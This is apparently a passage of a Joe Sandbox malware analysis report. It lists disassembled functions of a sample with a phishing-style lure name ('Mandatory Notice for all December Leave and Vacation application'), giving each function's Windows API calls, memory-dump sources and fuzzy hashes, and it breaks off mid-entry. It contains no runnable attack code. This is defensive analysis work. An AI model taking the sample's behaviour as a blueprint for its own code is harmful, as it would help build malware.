                                                      • InterlockedIncrement.KERNEL32(?), ref: 00FA7AE5
                                                      • __lock.LIBCMT ref: 00FA7AF9
                                                      • ___addlocaleref.LIBCMT ref: 00FA7B17
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 1687444384-0
                                                      • Opcode ID: d742b16deafb056d705c911a734db19db796194a0ac2e7609077f459df4d514b
                                                      • Instruction ID: 9ec860be886fc7f67d8c50108989787c8a70081f5628fc9f34c20bbc3b07b03d
                                                      • Opcode Fuzzy Hash: d742b16deafb056d705c911a734db19db796194a0ac2e7609077f459df4d514b
                                                      • Instruction Fuzzy Hash: 45015BB1504B00DED721EF65CD09B4AB7F0AF91325F20890EA4DAD7690CB78A680DB20
                                                      Function 00FEE32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FEE33D
                                                      • _memset.LIBCMT ref: 00FEE34C
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01043D00,01043D44), ref: 00FEE37B
                                                      • CloseHandle.KERNEL32 ref: 00FEE38D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3277943733-0
                                                      • Opcode ID: b6ba4fd0ed9d7acf55fc19efe64fb457cc689ee5742409040f6676fa3442e578
                                                      • Instruction ID: fb1e213b062d0532751fc21a5142defad76ab8f76320501bc3a944663a42bbb9
                                                      • Opcode Fuzzy Hash: b6ba4fd0ed9d7acf55fc19efe64fb457cc689ee5742409040f6676fa3442e578
                                                      • Instruction Fuzzy Hash: B9F05EF5540324BFE2202BA5BC85F777E6CEB05758F005421BEC8DA196D77A9C0097B8
                                                      Function 00FEEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00F9AFE3
                                                        • Part of subcall function 00F9AF83: SelectObject.GDI32(?,00000000), ref: 00F9AFF2
                                                        • Part of subcall function 00F9AF83: BeginPath.GDI32(?), ref: 00F9B009
                                                        • Part of subcall function 00F9AF83: SelectObject.GDI32(?,00000000), ref: 00F9B033
                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00FEEA8E
                                                      • LineTo.GDI32(00000000,?,?), ref: 00FEEA9B
                                                      • EndPath.GDI32(00000000), ref: 00FEEAAB
                                                      • StrokePath.GDI32(00000000), ref: 00FEEAB9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 1539411459-0
                                                      • Opcode ID: c2c293e6f144e7f2a5cdee4f25ca0e843492572f6569a3c338b08228d04e508d
                                                      • Instruction ID: 211c9e5920993cfdb34229d6e0e41282d7303e5d1842d441a5f3abd894829e83
                                                      • Opcode Fuzzy Hash: c2c293e6f144e7f2a5cdee4f25ca0e843492572f6569a3c338b08228d04e508d
                                                      • Instruction Fuzzy Hash: 8FF0BE31001258BBDB239FD4AD09FCA3F19AF0A320F044101FE41600D5877E9551DBE5
                                                      Function 00FBC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FBC84A
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FBC85D
                                                      • GetCurrentThreadId.KERNEL32 ref: 00FBC864
                                                      • AttachThreadInput.USER32(00000000), ref: 00FBC86B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      • Opcode ID: a4afdbc73b751306baa3e07dd0f7fc24d403a4c9160dfaaf75cbcb0c13629e02
                                                      • Instruction ID: 0d57e1db214e41689ae1b30ed4f61d9bd3583d9bed2e3fb01333e7d9112e26a7
                                                      • Opcode Fuzzy Hash: a4afdbc73b751306baa3e07dd0f7fc24d403a4c9160dfaaf75cbcb0c13629e02
                                                      • Instruction Fuzzy Hash: 80E03971542228BADB221BE2AC0DEDB7F1CEF0A7A1F008021B64985440C6B6C580DBF0
                                                      Function 00FBB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 00FBB0D6
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00FBAC9D), ref: 00FBB0DD
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FBAC9D), ref: 00FBB0EA
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00FBAC9D), ref: 00FBB0F1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      • Opcode ID: 136b515951574b63abb6269f78303d4e8fd9c3dc7176c34f0884ea378482c923
                                                      • Instruction ID: 2eae5561aee0ec24ad3e9b1c255ad5d7eb99539be2fc91c23e76e3186a981b86
                                                      • Opcode Fuzzy Hash: 136b515951574b63abb6269f78303d4e8fd9c3dc7176c34f0884ea378482c923
                                                      • Instruction Fuzzy Hash: 4CE04F72A01211ABD7316FF25C0CB973BA8AF557E2F018828B285D6044DA6984018B70
                                                      Function 00F9B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00F9B496
                                                      • SetTextColor.GDI32(?,000000FF), ref: 00F9B4A0
                                                      • SetBkMode.GDI32(?,00000001), ref: 00F9B4B5
                                                      • GetStockObject.GDI32(00000005), ref: 00F9B4BD
                                                      • GetWindowDC.USER32(?,00000000), ref: 00FFDE2B
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FFDE38
                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00FFDE51
                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00FFDE6A
                                                      • GetPixel.GDI32(00000000,?,?), ref: 00FFDE8A
                                                      • ReleaseDC.USER32(?,00000000), ref: 00FFDE95
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                      • String ID:
                                                      • API String ID: 1946975507-0
                                                      • Opcode ID: 204bf6e338d93cc373e7216594930177387630e7d1e60e929e1d8727ddddf28a
                                                      • Instruction ID: bcca0d120041c4abbe3daec4d7ad19a55344f5d45bcbb2bc38abb8d215d53cb2
                                                      • Opcode Fuzzy Hash: 204bf6e338d93cc373e7216594930177387630e7d1e60e929e1d8727ddddf28a
                                                      • Instruction Fuzzy Hash: E8E0ED31500244BAEF325FE8A80DBE83F11AB5533AF14C666FBA9580E5C7764591EB21
                                                      Function 00FBB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FBB2DF
                                                      • UnloadUserProfile.USERENV(?,?), ref: 00FBB2EB
                                                      • CloseHandle.KERNEL32(?), ref: 00FBB2F4
                                                      • CloseHandle.KERNEL32(?), ref: 00FBB2FC
                                                        • Part of subcall function 00FBAB24: GetProcessHeap.KERNEL32(00000000,?,00FBA848), ref: 00FBAB2B
                                                        • Part of subcall function 00FBAB24: HeapFree.KERNEL32(00000000), ref: 00FBAB32
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: 7e172f7ebc9af63a353badcb96feed03cb57f52e054f562772ba3ec878999909
                                                      • Instruction ID: a8662e17e6b526e7651719ea99ee797205174ddeb9e8b72e02e5bf9d59492c31
                                                      • Opcode Fuzzy Hash: 7e172f7ebc9af63a353badcb96feed03cb57f52e054f562772ba3ec878999909
                                                      • Instruction Fuzzy Hash: 20E0BF36104005BBCB122BD5DC08859FF66FF983217109221F66581569CB379471EB61
                                                      Function 00FFB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 1e9ce3a4b2e0ef35686a34a0c1dafa72e456e363eaea745f51b7e43b653e49f8
                                                      • Instruction ID: 9baafa1aa234af58dae041e2e8823ecaa76839186c2fb052f75db00e477cf117
                                                      • Opcode Fuzzy Hash: 1e9ce3a4b2e0ef35686a34a0c1dafa72e456e363eaea745f51b7e43b653e49f8
                                                      • Instruction Fuzzy Hash: 91E04FB1100204EFEB125FF0C84C62E7BA5EF4C360F11C805FD9A87200CB7998409B60
                                                      Function 00FFB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 647e40c969dc04f934633e9e1c00cd70b12bb7fec85336089875158a60c412ad
                                                      • Instruction ID: 18678cd97606e555fe8edee6c33eae3537e105d4d1f50125af86e7ecf0df5d8f
                                                      • Opcode Fuzzy Hash: 647e40c969dc04f934633e9e1c00cd70b12bb7fec85336089875158a60c412ad
                                                      • Instruction Fuzzy Hash: B9E046B1500200EFEF129FF0C84862D7BA9EB4C3A0F118809F99E8B200CB7E98409B20
                                                      Function 00FBDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 00FBDEAA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ContainedObject
                                                      • String ID: AutoIt3GUI$Container
                                                      • API String ID: 3565006973-3941886329
                                                      • Opcode ID: a7b92d838c2a2974c262252834391248e971d5d7740e3b4b4e87e4a24758787d
                                                      • Instruction ID: 0d9c5016e327b99fb3daa10cb786b5a5d41ba600a4a81d68690caca8e76c9ece
                                                      • Opcode Fuzzy Hash: a7b92d838c2a2974c262252834391248e971d5d7740e3b4b4e87e4a24758787d
                                                      • Instruction Fuzzy Hash: E8914670600601AFDB14DF65C884BAABBF9BF49710F24846DF84ACB691EB70E841DF61
                                                      Function 00F9BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00F9BCDA
                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 00F9BCF3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: 03a63f1061dbfab51e8b9950a07c635f8c05b90f0552122dd71cb206115df6a6
                                                      • Instruction ID: f9900a1fe2313014e4c809ec2f50436e55cfa041e14b5d1ce7894cd26b01d763
                                                      • Opcode Fuzzy Hash: 03a63f1061dbfab51e8b9950a07c635f8c05b90f0552122dd71cb206115df6a6
                                                      • Instruction Fuzzy Hash: 16514271409744ABE760AF10DC86BABBBECFF98354F41484EF1C8411A6DF7584A8A752
                                                      Function 00FCC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F844ED: __fread_nolock.LIBCMT ref: 00F8450B
                                                      • _wcscmp.LIBCMT ref: 00FCC65D
                                                      • _wcscmp.LIBCMT ref: 00FCC670
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$__fread_nolock
                                                      • String ID: FILE
                                                      • API String ID: 4029003684-3121273764
                                                      • Opcode ID: 4346c307528469d702f90beb6fc97ba47035f34a1da6444a8cee49ee2367353d
                                                      • Instruction ID: 34e35bbdef00348e90a658b3d818bfaacf878708e7df01a8c5708a0947fe1125
                                                      • Opcode Fuzzy Hash: 4346c307528469d702f90beb6fc97ba47035f34a1da6444a8cee49ee2367353d
                                                      • Instruction Fuzzy Hash: FE41C976A0020BBBDF10EAA4DD42FEF77B9AF49714F000469F605EB181D775AA04EB91
                                                      Function 00FEA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00FEA85A
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FEA86F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      • Opcode ID: b629fa7990500333a6879cd4d5872ee1bde1ae9de5a8dcfd185f0c0480815171
                                                      • Instruction ID: 05812470b9b6ca39f57721a1a0487577d10f245791c377ef90184313f7cd49c4
                                                      • Opcode Fuzzy Hash: b629fa7990500333a6879cd4d5872ee1bde1ae9de5a8dcfd185f0c0480815171
                                                      • Instruction Fuzzy Hash: FE412875E003499FDB14CFA9C880BDA7BB9FB08300F10016AE904AB381D770A941DFA1
                                                      Function 00FD5180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FD5190
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00FD51C6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_memset
                                                      • String ID: |
                                                      • API String ID: 1413715105-2343686810
                                                      • Opcode ID: 3d2c9b0f68874bc5a76c2bbad0749651fffc8eeb4d4f136d5fece792c147bea8
                                                      • Instruction ID: 52789f3d7b2c460012eb03e42afd7ede68c43cff073b8a6641035ecd33066c99
                                                      • Opcode Fuzzy Hash: 3d2c9b0f68874bc5a76c2bbad0749651fffc8eeb4d4f136d5fece792c147bea8
                                                      • Instruction Fuzzy Hash: 20311C71C00119ABCF11EFE4CC85AEE7FB9FF14750F140056F815A6266EB35AA46EBA0
                                                      Function 00FE975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00FE980E
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00FE984A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: 59f8f863232aaa8b1568731f9cfe657aa36ce5c92cc62de39386e6f9f9e30db6
                                                      • Instruction ID: 8b081ae535bb8d8681e12c69ed46c335889a28ea2e1dc2492948ae46b9aa9274
                                                      • Opcode Fuzzy Hash: 59f8f863232aaa8b1568731f9cfe657aa36ce5c92cc62de39386e6f9f9e30db6
                                                      • Instruction Fuzzy Hash: EA319C71510644AAEB209F75CC80BFB73A9FF99760F10861AF8A9C7190CA75AC81E760
                                                      Function 00FC5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FC51C6
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FC5201
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 8cc9c7487aa0da5797eed02c5f45161a823c2ab76cde58a3e5dbb1da429f955a
                                                      • Instruction ID: fc716cd8615a0839a1bfe13a601b3e9431bec7281b376be50545b83298755eb4
                                                      • Opcode Fuzzy Hash: 8cc9c7487aa0da5797eed02c5f45161a823c2ab76cde58a3e5dbb1da429f955a
                                                      • Instruction Fuzzy Hash: BA31D532E007069BEB25CF99DA46FDEBBF8BF45760F14401DE981A6190D774B984EB10
                                                      Function 00FD658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      APIs
